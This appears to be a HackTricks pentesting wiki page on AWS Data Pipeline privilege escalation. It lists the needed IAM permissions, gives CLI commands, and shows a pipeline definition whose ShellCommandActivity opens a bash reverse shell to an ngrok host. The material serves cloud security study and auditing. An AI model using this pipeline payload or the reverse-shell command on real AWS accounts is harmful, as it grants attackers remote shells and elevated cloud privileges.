AWS - Datapipeline Privesc
{{#include ../../../../banners/hacktricks-training.md}}
datapipeline
For more info about datapipeline check:
{{#ref}}
../../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
{{#endref}}
iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline
Users with these permissions can escalate privileges by creating a Data Pipeline to execute arbitrary commands using the permissions of the assigned role:
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:
{
"objects": [
{
"id": "CreateDirectory",
"type": "ShellCommandActivity",
"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn": { "ref": "instance" }
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id": "instance",
"name": "instance",
"type": "Ec2Resource",
"actionOnTaskFailure": "terminate",
"actionOnResourceFailure": "retryAll",
"maximumRetries": "1",
"instanceType": "t2.micro",
"securityGroups": ["default"],
"role": "assumable_datapipeline",
"resourceRole": "assumable_ec2_profile_instance"
}
]
}
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json
The pipeline definition file, crafted by the attacker, includes directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.
Potential Impact: Direct privesc to the ec2 service role specified.
References
{{#include ../../../../banners/hacktricks-training.md}}